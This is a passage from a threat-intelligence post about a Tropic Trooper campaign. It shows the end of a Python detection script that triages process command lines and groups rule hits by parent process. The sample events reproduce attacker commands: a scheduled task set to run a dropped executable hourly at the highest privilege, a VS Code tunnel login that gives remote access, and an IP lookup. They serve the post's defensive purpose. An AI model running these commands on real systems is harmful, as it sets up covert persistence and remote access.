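    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": _AGENT,
     "CommandLine": r"curl -s ip.me?t=1&m=2"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": _AGENT,
     "CommandLine": r"schtasks /create /tn \MSDNSvc /sc hourly /mo 2 /tr C:\users\public\documents\dsn.exe /f /RL HIGHEST"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": _AGENT,
     "CommandLine": r"cmd /c tasklist|findstr /i code.exe || code tunnel user login --provider github > z2.txt"},
    # benign noise: an ad-hoc download and a vendor updater task under Program Files
    {"Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"curl -O https://example.com/tool.zip"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'schtasks /create /tn \Vendor\Updater /sc daily /tr "C:\Program Files\Vendor\update.exe"'},
]


def triage(events: list) -> list:
    """Return one hit per event that matches at least one rule."""
    hits = []
    for ev in events:
        matched = [label for label, rx in RULES if rx.search(ev["CommandLine"])]
        if matched:
            hits.append({"cmd": ev["CommandLine"], "parent": ev["ParentImage"], "rules": matched})
    return hits


def summarize(events: list) -> dict:
    """Group the distinct rule labels by parent process. Several techniques firing
    under one parent, especially one outside Program Files or System32, is the
    pattern worth alerting on; a lone 'code tunnel' hit may just be a developer."""
    by_parent = {}
    for hit in triage(events):
        by_parent.setdefault(hit["parent"], set()).update(hit["rules"])
    return {parent: sorted(labels) for parent, labels in by_parent.items()}


if __name__ == "__main__":
    for parent, labels in summarize(SAMPLE_EVENTS).items():
        print(parent)
        for label in labels:
            print("   ", label)
```

The individual rules are deliberately plain substring and regex checks so they translate directly into an EDR query or a Sigma rule; the grouping by parent is where the signal is, since two of the seven techniques (the tunnel login and the ipinfo.io lookup) are legitimate on a developer workstation in isolation.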
The post Tropic Trooper Pivots to AdaptixC2 and Custom Beacon Listener appeared first on Security Boulevard.
Yin Hong Chang (Zscaler)
Source: Security Boulevard
Source Link: https://securityboulevard.com/2026/04/tropic-trooper-pivots-to-adaptixc2-and-custom-beacon-listener/